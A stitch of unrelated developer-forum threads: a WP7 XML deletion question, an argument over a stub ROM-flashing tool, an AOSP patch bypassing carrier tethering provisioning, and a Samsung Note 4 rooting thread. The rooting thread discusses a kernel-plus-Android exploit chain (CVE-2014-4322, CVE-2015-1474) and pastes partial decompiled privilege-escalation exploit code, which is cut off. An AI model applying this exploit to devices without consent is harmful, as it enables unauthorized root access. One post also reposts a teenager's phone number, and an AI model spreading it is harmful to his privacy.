Related
Hi there,
I'm having a big issue, when trying to remove an XElement from an XML file created in IsolatedStorage.
--------------------------------------------------------------------------------------------
Code to CREATE the XML file
Dim File_to_Create As String = "Tracks.xml"
Dim file As XDocument = <?xml version="1.0" encoding="UTF-8"?>
<dataroot xmlnsd="urn:schemas-microsoft-comfficedata" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="Cartridges.xsd" generated="2010-11-23T14:26:55">
<Carts>
<CART_NAME>First</CART_NAME>
<CART_COLOR>White</CART_COLOR>
</Carts>
<Carts>
<CART_NAME>Second</CART_NAME>
<CART_COLOR>Black</CART_COLOR>
</Carts>
</dataroot>
Dim isoStore As IsolatedStorageFile = IsolatedStorageFile.GetUserStoreForApplication()
Try
If isoStore.FileExists(File_to_Create) Then
MessageBox.Show(File_to_Create + " TRUE")
Else
MessageBox.Show(File_to_Create + " FALSE")
Dim oStream As New IsolatedStorageFileStream(File_to_Create, FileMode.Create, isoStore)
Dim writer As New StreamWriter(oStream)
writer.WriteLine(file)
writer.Close()
MessageBox.Show("OK")
End If
Catch ex As Exception
MessageBox.Show(ex.Message)
Finally
'open selected file
Dim isoStream As IsolatedStorageFileStream
isoStream = New IsolatedStorageFileStream(File_to_Create, System.IO.FileMode.Open, System.IO.FileAccess.Read, isoStore)
Dim XML_File As XDocument = XDocument.Load(isoStream)
Dim Cart_Query As System.Collections.IEnumerable = From query In XML_File.Descendants("Carts") Order By _
CStr(query.Element("CART_NAME")) Descending, CStr(query.Element("CART_NAME"))
Select New Class_Cartridge_Data With {.Cart_Name = CStr(query.Element("CART_NAME")), _
.Cart_Color = CStr(query.Element("CART_COLOR"))}
Me.ListBox_Cartridges.ItemsSource = Cart_Query
isoStore.Dispose()
isoStream.Close()
End Try
--------------------------------------------------------------------------------------------
Code to ADD / EDIT XElement
Dim File_to_Create As String = "Tracks.xml"
Dim XML_IsolatedStorage = IsolatedStorageFile.GetUserStoreForApplication()
' Check that the file exists if not create it
If Not (XML_IsolatedStorage.FileExists(File_to_Create)) Then
Return
End If
Dim XML_StreamReader As New StreamReader(XML_IsolatedStorage.OpenFile(File_to_Create, FileMode.Open, FileAccess.Read))
Dim XML_Document As XDocument = XDocument.Parse(XML_StreamReader.ReadToEnd())
XML_StreamReader.Close()
' Update the element if it exist or create it if it doesn't
Dim XML_XElement As XElement = XML_Document.Descendants("Carts").Where(Function(c) c.Element("CART_NAME").Value.Equals("First")).FirstOrDefault()
If XML_XElement IsNot Nothing Then
XML_XElement.SetElementValue("CART_NAME", "Third")
Else
' Add new
Dim newProgress As New XElement("Cartridges", New XElement("CART_NAME", "Fourth"), New XElement("CART_COLOR", "Blue"))
Dim rootNode As XElement = XML_Document.Root
rootNode.Add(newProgress)
End If
Using XML_StreamWriter As New StreamWriter(XML_IsolatedStorage.OpenFile(File_to_Create, FileMode.Open, FileAccess.Write))
XML_StreamWriter.Write(XML_Document.ToString())
XML_StreamWriter.Close()
End Using
--------------------------------------------------------------------------------------------
Now my issue and request for some help!
If I use
XML_XElement.Remove
then the following exception is raised whenever I try to "refresh" the bounded ListBox
System.Xml.XmlException was unhandled
LineNumber=37
LinePosition=12
Message=Data at the root level is invalid. Line 37, position 12.
SourceUri=""
StackTrace:
at System.Xml.XmlTextReaderImpl.Throw(Exception e)
at System.Xml.XmlTextReaderImpl.Throw(Int32 res, String resString, String[] args)
at System.Xml.XmlTextReaderImpl.Throw(Int32 res, String resString)
at System.Xml.XmlTextReaderImpl.ParseRootLevelWhitespace()
at System.Xml.XmlTextReaderImpl.ParseDocumentContent()
at System.Xml.XmlTextReaderImpl.Read()
at System.Xml.Linq.XContainer.ReadContentFrom(XmlReader r)
at System.Xml.Linq.XContainer.ReadContentFrom(XmlReader r, LoadOptions o)
at System.Xml.Linq.XDocument.Load(XmlReader reader, LoadOptions options)
at System.Xml.Linq.XDocument.Load(Stream stream, LoadOptions options)
at System.Xml.Linq.XDocument.Load(Stream stream)
at ListBox_Data_from_XML_LINQ.MainPage.Button_Create_XML_Click(Object sender, RoutedEventArgs e)
at System.Windows.Controls.Primitives.ButtonBase.OnClick()
at System.Windows.Controls.Button.OnClick()
at System.Windows.Controls.Primitives.ButtonBase.OnMouseLeftButtonUp(MouseButtonEventArgs e)
at System.Windows.Controls.Control.OnMouseLeftButtonUp(Control ctrl, EventArgs e)
at MS.Internal.JoltHelper.FireEvent(IntPtr unmanagedObj, IntPtr unmanagedObjArgs, Int32 argsTypeIndex, String eventName)
InnerException:
--------------------------------------------------------------------------------------------
In short, I can add or edit, but cannot DELETE an XElement...
Any ideas?
Thanks in advance!
Can you post the code you are using for XElement.Remove and use code tags so the formatting is right. Its the # button on the post toolbar.
Ren13B said:
Can you post the code you are using for XElement.Remove and use code tags so the formatting is right. Its the # button on the post toolbar.
Click to expand...
Click to collapse
Well, I did nothing special, just the XML_Element.remove, instead of adding a new xelement.
Then the error raises whenever I try to reopen the XML file.
My point is, how can I delete an specific xelement?
As far as I know, the following code should work
Code:
Dim XML_XElement As XElement = XML_Document.Descendants("Carts").Where(Function(c ) c.Element("CART_NAME").Value.Equals("First")).Firs tOrDefault()
If XML_XElement IsNot Nothing Then
XML_XElement.SetElementValue("CART_NAME", "Third")
Else
' remove the selected record
XML_XElement.Remove
End If
Honestly I don't know if the foregoing code is correct or if the issue is related to how WP7 handles the removal thus corrupting the original file.
Please let me know if you need anything else.
Any help is very appreciated!
PS: Thanks for the other replies, helped a lot!
Here's how I did it in c#. My xml file is very different than yours so the query will be different but the important parts are where you load and close the file streams and then write.
Code:
//Get users private store info
IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForApplication();
IsolatedStorageFileStream isoStream;
//open selected file
isoStream = new IsolatedStorageFileStream(list, System.IO.FileMode.Open, System.IO.FileAccess.Read, isoStore);
XDocument xml = XDocument.Load(isoStream);
isoStream.Close();
//Find section
XElement sectionElement = xml.Descendants("section").Where(c => c.Attribute("name").Value.Equals(groupn)).FirstOrDefault();
//Find item and remove it
sectionElement.Elements("setting").Where(c => c.Attribute("name").Value.Equals(litem)).FirstOrDefault().Remove();
isoStream.Close(); //Seems unnecessary but it's needed.
//Write xml file
isoStream = new IsolatedStorageFileStream(list, FileMode.Create, FileAccess.Write, isoStore);
xml.Save(isoStream);
isoStream.Close();
Thanks again for your help, greatly appreciated.
However I'm still getting the same error.
Sorry for asking, but are you getting any errors when deleting in WP7 ?
My knowledge on XML is extremely new and I'm sure that I'm making some mistakes somewhere...
But so far, I cannot get past the same exception.
Seems that the XML gots "corrupted" after the delete operation.
On the other hand, if is not too much to ask for, using my current code, how will handle the delete of the selected record?
Thanks!
I have no problem at all removing elements in c#. I don't have vb support even installed right now. If you think it's a bug you should post on the forums at http://forums.create.msdn.com/forums/98.aspx
Ren13B said:
I have no problem at all removing elements in c#. I don't have vb support even installed right now. If you think it's a bug you should post on the forums at http://forums.create.msdn.com/forums/98.aspx
Click to expand...
Click to collapse
Problem is my country is not listed so I cannot register...
Here is the C# version of my current code for adding/editing
Code:
public static void ADD_XML_Record()
{
string File_to_Create = "Tracks.xml";
var XML_IsolatedStorage = IsolatedStorageFile.GetUserStoreForApplication();
// Check that the file exists if not create it
if (! (XML_IsolatedStorage.FileExists(File_to_Create)))
{
return;
}
StreamReader XML_StreamReader = new StreamReader(XML_IsolatedStorage.OpenFile(File_to_Create, FileMode.Open, FileAccess.Read));
XDocument XML_Document = XDocument.Parse(XML_StreamReader.ReadToEnd());
XML_StreamReader.Close();
// Update the element if it exist or create it if it doesn't
XElement XML_XElement = XML_Document.Descendants("Carts").Where((c) => c.Element["CART_NAME"].Value.Equals("dd")).FirstOrDefault();
if (XML_XElement != null)
{
XML_XElement.SetElementValue("CART_NAME", "bbbbb");
}
else
{
// Add new
XElement newProgress = new XElement("Carts", new XElement("CART_NAME", "dd"), new XElement("CART_COLOR", "ff"));
XElement rootNode = XML_Document.Root;
rootNode.Add(newProgress);
}
using (StreamWriter XML_StreamWriter = new StreamWriter(XML_IsolatedStorage.OpenFile(File_to_Create, FileMode.Open, FileAccess.Write)))
{
XML_StreamWriter.Write(XML_Document.ToString());
XML_StreamWriter.Close();
}
}
I tried your code but I'm having a bad time making it to work.
If not a big deal, please could you tell me how to modify it ?
I mean, if a record is found, instead of editing, to remove it?
Honestly I'm stuck and any help is more than apprecisted!
Ren13B said:
I have no problem at all removing elements in c#. I don't have vb support even installed right now. If you think it's a bug you should post on the forums at http://forums.create.msdn.com/forums/98.aspx
Click to expand...
Click to collapse
Ren,
Just to say thank you for your last code. I made a little mod and now it works ok!
Thanks a lot for helping me out!
Hi everyone,
Today i come here with ideas.....
which is
HTC RUU in .NET Flavour
you can browse for nbh file, not locked at current folder with this tool
the project has its site located at: http://htcruunet.codeplex.com
i hope anyone want to collaborate in this project, because, my c# skill is SEVERLY WEAK.
Dev. Status:
-Prototype (UI Design)
aramadsanar said:
....Today i come here with ideas.....
Click to expand...
Click to collapse
Something like that:
Whitestone Advanced ROM Update Utility
Kovsky Advanced ROM Update Utility
Topaz Advanced ROM Update Utility
Blackstone Advanced ROM Update Utility
Mozart Advanced ROM Update Utility
LEO Advanced ROM Update Utility
by Barin????....
The main benefit is .Net 4 (Barin used 3.5) and possibility not to put nbh to one folder with the flasher?
Or again - adding "eye candy" features? Maybe pink dots on main window?
Funny
AndrewSh said:
Something like that:
Whitestone Advanced ROM Update Utility
Kovsky Advanced ROM Update Utility
Topaz Advanced ROM Update Utility
Blackstone Advanced ROM Update Utility
Mozart Advanced ROM Update Utility
LEO Advanced ROM Update Utility
by Barin????....
The main benefit is .Net 4 (Barin used 3.5) and possibility not to put nbh to one folder with the flasher?
Or again - adding "eye candy" features? Maybe pink dots on main window?
Funny
Click to expand...
Click to collapse
don't talk sinister here
---------------------------------------------------------------------------
ok, the differences is, i aimed to make it open source, but, barin's closed
so, the benefit is, people can learn how RUU works, not just a frickin' eye candy.
that's it
---------------------------------------------------------------------------
come on, grow up, we're here to learn, develop, share, not to talk sinister
This "program" does NOTHING. STOP SPAMMING FORUM WITH YOUR USELESS PROGRAMS.
Entire source code:
Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using Microsoft.Win32;
namespace RUUNET
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
button2.Enabled = false;
}
private void ignoreRUURequirementsToolStripMenuItem_Click(object sender, EventArgs e)
{
checkBox2.Enabled = false;
}
private void button2_Click(object sender, EventArgs e)
{
}
public void UpdateDevice()
{
if (checkBox2.Enabled == false)
{
FlashNbh();
}
else
{
GetDeviceModel();
GetDeviceCID();
GetBattery();
VerifyRomWithDeviceModel();
FlashNbh();
}
}
public void GetDeviceCID()
{
}
public void GetBattery()
{
}
public void GetDeviceModel()
{
}
public void VerifyRomWithDeviceModel()
{
}
public void FlashNbh()
{
}
private void button1_Click(object sender, EventArgs e)
{
openFileDialog1.FileName = " ";
openFileDialog1.Title = "Choose ROM Image to Flash";
openFileDialog1.ShowDialog();
}
private void openFileDialog1_FileOk(object sender, CancelEventArgs e)
{
if (openFileDialog1.FileName.Contains(".nbh"))
{
button2.Enabled = true;
textBox1.Text = openFileDialog1.FileName.ToString();
}
else
{
NBHError();
}
}
private void enableRUURequirementsToolStripMenuItem_Click(object sender, EventArgs e)
{
checkBox2.Enabled = true;
}
public void NBHError()
{
MessageBox.Show("The file you selected is not NBH File", "Not NBH File", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
}
}
Useless guy, but actually the idea is cool - kinda: "guys, I will start VS project and make interface. The rest is almost nothing - code and full functionality - should be done by you guys - and you will be co-authors... Maybe....". Nice!
Useless guy said:
This "program" does NOTHING. STOP SPAMMING FORUM WITH YOUR USELESS PROGRAMS.
Entire source code:
Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using Microsoft.Win32;
namespace RUUNET
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
button2.Enabled = false;
}
private void ignoreRUURequirementsToolStripMenuItem_Click(object sender, EventArgs e)
{
checkBox2.Enabled = false;
}
private void button2_Click(object sender, EventArgs e)
{
}
public void UpdateDevice()
{
if (checkBox2.Enabled == false)
{
FlashNbh();
}
else
{
GetDeviceModel();
GetDeviceCID();
GetBattery();
VerifyRomWithDeviceModel();
FlashNbh();
}
}
public void GetDeviceCID()
{
}
public void GetBattery()
{
}
public void GetDeviceModel()
{
}
public void VerifyRomWithDeviceModel()
{
}
public void FlashNbh()
{
}
private void button1_Click(object sender, EventArgs e)
{
openFileDialog1.FileName = " ";
openFileDialog1.Title = "Choose ROM Image to Flash";
openFileDialog1.ShowDialog();
}
private void openFileDialog1_FileOk(object sender, CancelEventArgs e)
{
if (openFileDialog1.FileName.Contains(".nbh"))
{
button2.Enabled = true;
textBox1.Text = openFileDialog1.FileName.ToString();
}
else
{
NBHError();
}
}
private void enableRUURequirementsToolStripMenuItem_Click(object sender, EventArgs e)
{
checkBox2.Enabled = true;
}
public void NBHError()
{
MessageBox.Show("The file you selected is not NBH File", "Not NBH File", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
}
}
Click to expand...
Click to collapse
well, i'm not spamming, i have a working program (WPE4), but, in this case, i only can design the program, but, i got stuck when thinking about SPL commands, so, this is why i made it in codeplex, to make it open source, and collaborate, if you like to collaborate in this project, you're welcome
and, if you think that my project(s) is totally USELESS, then, do not use it, easy, right
Guys, break up!
Quote from his profile
I'm 14 yrs old, and, i'm coordinator & initiator of Advanced WPE. I'm also a ROM Cooker for HTC HD7.
You can contact me by:
Email: [email protected]
Twitter: @aramadsanar
Phone: +628989739611
Click to expand...
Click to collapse
Wow, there is email and even phone, so if you, guys, wanna to help "coordinator & initiator of Advanced WPE & a ROM Cooker for HTC HD7", contact him. Unfortunately, as you see, I'm from russia and the international calls are very expensive for me.
Useless guy said:
Wow, there is email and even phone, so if you, guys, wanna to help "coordinator & initiator of Advanced WPE & a ROM Cooker for HTC HD7", contact him. Unfortunately, as you see, I'm from russia and the international calls are very expensive for me.
Click to expand...
Click to collapse
Unfortunately for me too
@aramadsanar
If you want an advice:
1. Do not import all available assemblies into your project, just use only neccesery.
2. Use "Public" definition only if you want to provide access to your functions or variables from external programs.
3. Avoid default naming of controls - after a few weeks you will forget what is your button for (for example), especially if you plan to change some of its properties programmatically later.
4. If you want to write RUU try to use stock RUU as external executable in your program at first
Good luck!
Useless guy said:
Guys, break up!
Quote from his profile
Wow, there is email and even phone, so if you, guys, wanna to help "coordinator & initiator of Advanced WPE & a ROM Cooker for HTC HD7", contact him. Unfortunately, as you see, I'm from russia and the international calls are very expensive for me.
Click to expand...
Click to collapse
wait, you can mention me, or email me LOL
Please note that this question is purely academic in nature. My phone is not broken, and all the features I need are enabled. I just want to know how to make similar changes myself (see below).
Forgive me if this is in the wrong forum. I was going to post this in the Verizon Samsung Galaxy Nexus Development forum, but the site warned me that asking questions in that forum was against the rules (OK, I won't post my question there)!
I have a "toro" (Samsung Galaxy Nexus for VzW with LTE/CDMA).
Yesterday, I repo synced my AOSP source to bring it up to date. My phone is running an almost stock "maguro" (rooted) JRO03O from https://dl.google.com/dl/android/aosp/mysid-jro03o-factory-f17426e6.tgz .
Then I sourced build/envsetup.sh and selected full_toro-user (yes, "user", not "userdebug" ) with the lunch menu.
I then made what I thought was a clever patch to packages/apps/Settings/src/com/android/settings/TetherSettings.java where I added a few constants and a boolean function called isProvisioningAllowed() that is called by a now modified boolean function isProvisioningNeeded(). Essentially, isProvisioningNeeded() now checks to see if the Android owner allows his carrier to limit tethering to provisioned users (before checking to see if the carrier requires provisioning). As you may have guessed, using my patch, the default setting is now that the carrier is not allowed by the Android owner to require provisioning from the user.
For anyone curious, here is the .diff for my patch for TetherSettings.java (Java is not a programming language that I "know", but I can figure out most of the syntax from the existing code - so I may have crappy code) :
Code:
project packages/apps/Settings/
diff --git a/src/com/android/settings/TetherSettings.java b/src/com/android/settings/TetherSettings.java
index 4a79eca..63f1526 100644
--- a/src/com/android/settings/TetherSettings.java
+++ b/src/com/android/settings/TetherSettings.java
@@ -106,6 +106,11 @@ public class TetherSettings extends SettingsPreferenceFragment
private String[] mProvisionApp;
private static final int PROVISION_REQUEST = 0;
+ /* Is carrier allowed to require provisioning for tethering */
+ private static final int CARRIER_TETHERING_PROVISIONING_ALLOWED = 0;
+ private static final int CARRIER_TETHERING_PROVISIONING_PROHIBITED = -1;
+ private int mCarrierTetheringProvisioning = CARRIER_TETHERING_PROVISIONING_PROHIBITED;
+
@Override
public void onCreate(Bundle icicle) {
super.onCreate(icicle);
@@ -424,6 +429,36 @@ public class TetherSettings extends SettingsPreferenceFragment
return false;
}
+ boolean isProvisioningAllowed() {
+ /* returns whether Android owner allows carrier to restrict tethering to provisioned users */
+ if (mCarrierTetheringProvisioning == CARRIER_TETHERING_PROVISIONING_PROHIBITED) {
+ return false;
+ }
+ if (mCarrierTetheringProvisioning == CARRIER_TETHERING_PROVISIONING_ALLOWED) {
+ return true;
+ }
+ /* If neither of the above values match mCarrierTetheringProvisioning then assume it is prohibited by Android owner */
+ return false;
+ }
+
+ boolean isProvisioningNeeded() {
+ /* first check to see if provisioning is allowed before checking to see if it is needed */
+ if (isProvisioningAllowed()) {
+ /* provisioning is allowed, check to see if needed */
+ if (SystemProperties.getBoolean("net.tethering.noprovisioning", false)) {
+ /* provisioning is allowed, but not needed */
+ return false;
+ }
+ /* provisioning is allowed (and needed if mProvisionApp array has two values) */
+ return mProvisionApp.length == 2;
+ } else {
+ /* provisioning is not allowed, therefore it is not needed */
+ return false;
+ }
+
+/* Original (unaltered) isProvisioningNeeded() function
+
boolean isProvisioningNeeded() {
if (SystemProperties.getBoolean("net.tethering.noprovisioning", false)) {
return false;
@@ -431,6 +466,8 @@ public class TetherSettings extends SettingsPreferenceFragment
return mProvisionApp.length == 2;
}
+*/
+
private void startProvisioningIfNecessary(int choice) {
mTetherChoice = choice;
if (isProvisioningNeeded()) {
Then I built the entire tree. Next, I backed up "Settings.apk" and "Settings.odex" from my /system/app directory on my phone. Also, I remounted /system as r/w. I then dropped in the new "Settings.apk" and "Settings.odex" from my custom build, and set the owner.group to root.root (on both) and permissions to 644 (on both). I remounted /system as r/o again.
Even with a cold boot, the "Settings" menu crashes when launched (with my "Settings.apk" and "Settings.odex" in place).
I restored my backups for those two system files, and rebooted again (which fixed my Settings menu/app). I then downloaded somebody else's fixed "framework-res.apk" and deleted "SPG.apk". While this accomplishes one goal (no carrier restrictions on Google Android native tethering), it does not help me learn how to do this myself.
I want to be able to tweak the AOSP source on the fly, and produce binaries that are compatible with my ROM.
So my problem basically breaks down to the following 4 sub-questions:
1) Can anyone tell me why my customized "Settings.apk" and "Settings.odex" crash when "Settings" is launched?
2) Did I make a change that would break binary compatibility (I tried not to)?
3) Or is it because the current version of AOSP builds binaries for 4.1.2 (JZO54K) instead of for 4.1.1 (JRO03O)?
4) How do I build AOSP for an older tag anyway (like 4.1.1_r1)?
WelcomeFirst I have to ask that everyone please follow the rules when posting in here.The last thread was shut down due to people getting off topic so let's stay on track here, if you have a question that you'd like to ask and are unsure if it belongs here then simply PM me and I'll help. In order to get things going I've added a simple FAQ below for people who may not be up to speed.
Q: What's needed to root the N910A/N910V?
A: A kernel exploit and an Android OS exploit.
Q: What's the current status?
A: We have a kernel exploit that will work for us and the method to implement it. Our next goal is to apply an Android exploit which will grant us System UID in order to apply our kernel exploit and write root.
Q: What exploit are we using for the kernel side?
A. The exploit will be the work of @zxz0O0 and is based off of CVE-2014-4322. This is confirmed NOT patched by Samsung.
Q: What exploit are we using for Android side?
A. Current target is CVE-2015-1474. We've explored a previous exploit which has proven to work for the Sony Z3 (CVE-2014-7911), but unfortunately Samsung fixed this prior to releasing our devices.
Current Focus - Creating an APK that will exploit CVE-2015-1474 to elevate us to System UID. This is where we are at this current time. We will need a crafty Dev to come up with such APK. I am a novice when it comes to scripting and exploiting but in my free time I've been soaking up as much information as I possibly can to help in the future.
.
Working on PoC here:
https://github.com/p1gl3t/CVE-2015-1474_poc
Other Threads working on 2015-1474
http://forum.xda-developers.com/kin...luating-cve-2015-1474-to-escalate-to-t3045163
android-DEP said:
@ZPaul2Fresh8 confirmed that CVE-2014-4322 (qseecom) is fixed in N910AUCU1BNK3 but it might not be in N910AUCU1ANIE.
Click to expand...
Click to collapse
To clarify, CVE-2014-4322 is NOT patched in ANY baseband version on our devices. CVE-2014-7911 is the patched.
munjeni said:
Its not obfuscated if you think about file called "main"! It is 7z archive but removed first 2 bytes "7z" or hex "377A", just simple open "main" file with hex editor and append 2 bytes 37 7A to the start of the file and save them! It is password protected 7z archive and you must research for password in asembly if you think to open them with 7z I stil have no idea what is purpose of these "main" file (malware?) when there is another one "main" file (tar.gz) which is extracted when you execute file "a", but I know thats a two diferent "main" files!
Click to expand...
Click to collapse
From @idler1984 , here's the explanation of the 'a' and 'main' files. HERE.
jorgasm209 said:
Not sure how to prove something that isn't there... hard to prove a negative. APK is claiming not vulnerable even with the apparent absence of checkAndGetTcObjectClass in the firmware. Someone much smarter than me can attempt to find out why My bet is on @android-DEP ... see post above regarding ServiceExploitActivity.java.
Click to expand...
Click to collapse
It's been confirmed by me that exploit CVE-2014-7911 has been patched in the latest OTA (NK3 on AT&T) and I believe @zxz0O0 confirmed it on the earlier baseband too. If you're in doubt and you're running the earlier build, just go to system/framework/core.odex and you'll find the function is located there...
Now if you're just skimming through here let me catch everyone up to speed here;
At this point in order to achieve root for our devices we will need a combination of exploits. There are a ton of CVE's being thrown and I can see why people are getting confused so I'll try to make it easier to understand. I'll break it down by CVE #.
CVE-2014-7911 - Patched so it doesn't matter. Android OS exploit to gain System UID. Not Root
CVE-2014-8609 - Android OS exploit. Possibly our next venture for gaining System UID, I've been told otherwise. Another vulnerability exists that may be easier. CVE-2015-1474
CVE-2014-4322 - Kernel exploit. Un-patched. Used to get Root while in System status.
So we need an exploit to get us System status and from there we pretty much have CVE-2014-4322 exploit to get Root from there.
Now, you may have read about Root solutions such as geifroot & 2014-79xx but forget about them because they are all based on Team Keen's exploit of CVE-2014-7911 which we confirmed has been backported and patched from day 1 on our devices. So in order to proceed we need a new exploit to get System status first... that vulnerability may be 2015-1474....
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
zxz0O0 said:
ZPaul2Fresh8, thanks for this write up. Finally someone who has understood the situation. I'm not really experienced in Java but I believe CVE-2014-8609 will not be useful. This exploit is for broadcasting actions to apps (e.g. dialing), not executing shell commands or binaries.
Click to expand...
Click to collapse
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
munjeni said:
Guys, CVE-2014-4322 root exploit from retme7 is not working, it need a lot of modifications, I am working on this 3 days and I am on 90 percent of luck, I am now stuck with this -> http://forum.xda-developers.com/showpost.php?p=58460530&postcount=1171
If you have idea for how I can change app_id than I will get it working and will share source with you!
This is decompiled source from guy who have it working and don't want to share them:
Code:
void sub_89F4(void) {
;
}
int __fastcall sub_8A78(signed int a1, int a2)
{
signed int v2; // [email protected]
FILE *v3; // [email protected]
void *v4; // [email protected]
signed int v5; // [email protected]
FILE *v6; // [email protected]
int v7; // [email protected]
char v8; // [email protected]
const char *v9; // [email protected]
_UNKNOWN *v10; // [email protected]
_UNKNOWN *v11; // [email protected]
char **v12; // [email protected]
const char *v13; // [email protected]
int result; // [email protected]
int ion_fd; // [email protected]
int v16; // [email protected]
int v17; // [email protected]
int *v18; // [email protected]
char *v19; // [email protected]
int v20; // [email protected]
int qseecom_fd; // [email protected]
int v22; // [email protected]
int v23; // [email protected]
int v24; // [email protected]
int *v25; // [email protected]
char *v26; // [email protected]
int *v27; // [email protected]
int v28; // [email protected]
int v29; // [email protected]
int v30; // [email protected]
int v31; // [email protected]
int v32; // [email protected]
int v33; // [email protected]
int v34; // [email protected]
int v35; // [email protected]
int *v36; // [email protected]
int v37; // [email protected]
int v38; // [email protected]
int v39; // [email protected]
int v40; // [email protected]
int *v41; // [email protected]
int v42; // [email protected]
int v43; // [email protected]
void *v44; // [email protected]7
int v45; // [email protected]
int v46; // [email protected]
unsigned int v47; // [email protected]
int v48; // [email protected]
int v49; // [email protected]
int v50; // [email protected]
int *v51; // [email protected]
int ptmx_fd; // [email protected]
int v53; // [email protected]
int v54; // [email protected]
int v55; // [email protected]
int v56; // [email protected]
int *v57; // [email protected]
char *v58; // [email protected]
int v59; // [sp+Ch] [bp-1F4h]@1
int memfile_fd; // [sp+Ch] [bp-1F4h]@26
void *ion_void; // [sp+14h] [bp-1ECh]@26
int v62; // [sp+18h] [bp-1E8h]@24
int v63; // [sp+1Ch] [bp-1E4h]@38
int v64; // [sp+20h] [bp-1E0h]@38
int v65; // [sp+24h] [bp-1DCh]@38
int v66; // [sp+28h] [bp-1D8h]@38
int v67; // [sp+2Ch] [bp-1D4h]@22
int v68; // [sp+30h] [bp-1D0h]@22
int v69; // [sp+34h] [bp-1CCh]@22
int v70; // [sp+38h] [bp-1C8h]@22
int v71; // [sp+3Ch] [bp-1C4h]@24
unsigned int v72; // [sp+40h] [bp-1C0h]@41
int v73; // [sp+44h] [bp-1BCh]@41
int v74; // [sp+48h] [bp-1B8h]@41
int v75; // [sp+4Ch] [bp-1B4h]@41
int v76; // [sp+50h] [bp-1B0h]@41
unsigned int v77; // [sp+54h] [bp-1ACh]@41
int v78; // [sp+58h] [bp-1A8h]@41
int v79; // [sp+5Ch] [bp-1A4h]@41
int v80; // [sp+60h] [bp-1A0h]@41
int v81; // [sp+64h] [bp-19Ch]@41
int v82; // [sp+68h] [bp-198h]@41
int v83; // [sp+6Ch] [bp-194h]@41
char v84; // [sp+70h] [bp-190h]@4
char v85[4]; // [sp+90h] [bp-170h]@29
int v86; // [sp+94h] [bp-16Ch]@29
int v87; // [sp+98h] [bp-168h]@29
char v88; // [sp+9Ch] [bp-164h]@29
int v89; // [sp+A0h] [bp-160h]@30
int v90; // [sp+A4h] [bp-15Ch]@30
int v91; // [sp+A8h] [bp-158h]@30
int v92; // [sp+ACh] [bp-154h]@30
int v93; // [sp+B0h] [bp-150h]@30
int v94; // [sp+B4h] [bp-14Ch]@30
int v95; // [sp+B8h] [bp-148h]@30
int v96; // [sp+BCh] [bp-144h]@30
int v97; // [sp+C0h] [bp-140h]@30
int v98; // [sp+C4h] [bp-13Ch]@30
int v99; // [sp+C8h] [bp-138h]@30
int v100; // [sp+CCh] [bp-134h]@30
char v101; // [sp+D4h] [bp-12Ch]@1
int v102; // [sp+1D4h] [bp-2Ch]@1
char v103; // [sp+1D8h] [bp-28h]@4
v2 = a1;
v102 = _stack_chk_guard;
v59 = a2;
puts("giefroot (c) zxz0O0");
v3 = fopen("/proc/version", "r");
fread(&v101, 0x100u, 1u, v3);
fclose(v3);
v4 = malloc(0x100u);
v5 = 30;
v6 = fopen("/system/build.prop", "r");
do
{
while ( 1 )
{
fgets((char *)v4, 256, v6);
v7 = strncmp((const char *)v4, "ro.product.device=", 0x12u);
v8 = v7;
if ( !v7 )
break;
--v5;
if ( !v5 )
goto LABEL_5;
}
strcpy(&v84, (const char *)v4 + 18);
--v5;
*(&v103 + strlen(&v84) - 361) = v8;
}
while ( v5 );
LABEL_5:
fclose(v6);
free(v4);
v9 = supported_kernel[0];
if ( supported_kernel[0] )
{
v10 = &unk_D014;
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
do
{
if ( !strcmp(v9, &v101) && (!v12 || !strcmp((const char *)*((int *)v10 - 4), &v84)) )
{
v12 = &supported_kernel[5 * v5];
unk_D0A4 = &supported_kernel[5 * v5];
}
v13 = *(const char **)v10;
v10 = (char *)v10 + 20;
v9 = v13;
++v5;
}
while ( v13 );
}
else
{
v11 = &unk_D0A4;
v12 = (char **)unk_D0A4;
}
if ( v12 )
{
v12 = (char **)1;
}
else
{
puts("Error: Kernel not supported");
printf("Device: %s, Kernel: %s\n", &v84, &v101);
*(int *)v11 = supported_kernel;
}
if ( v2 > 1 && !strcmp(*(const char **)(v59 + 4), "-s") )
{
result = (unsigned int)v12 ^ 1;
goto error;
}
ion_fd = open("/dev/ion", 0);
if ( ion_fd < 0 )
puts("Error opening ion device");
v67 = 256;
v68 = 4;
v69 = 134217728;
v70 = 1;
sub_89F4();
v16 = ioctl(ion_fd, ION_IOC_ALLOC, &v67);
if ( v16 )
{
v25 = (int *)((int (*)(void))_errno)();
v26 = strerror(*v25);
printf("Error ioctl: %d / %s\n", v16, v26);
}
else
{
sub_89F4();
}
v62 = v71;
v17 = ioctl(ion_fd, ION_IOC_SHARE, &v62);
if ( v17 )
{
v18 = (int *)((int (*)(void))_errno)();
v19 = strerror(*v18);
printf("Error ioctl: %d / %s\n", v17, v19);
}
else
{
sub_89F4();
}
sub_89F4();
ion_void = (void *)mmap(0, 256, 7, 1);
memset(ion_void, 255, 0x100u);
memfile_fd = open("/data/local/tmp/memfile", 2);
if ( memfile_fd < 0 )
sub_89F4();
v20 = mmap(0, 2113929216, 7, 1);
if ( v20 == -1 )
puts("mmap shared_buf failed");
qseecom_fd = open("/dev/qseecom", 0);
if ( qseccom_fd < 0 )
{
puts("Error opening qseecom");
getting_root:
close(memfile_fd);
close(ion_fd);
close(qseccom_fd);
puts("getting root...");
ptmx_fd = open("/dev/ptmx", 0);
fsync(ptmx_fd, v53);
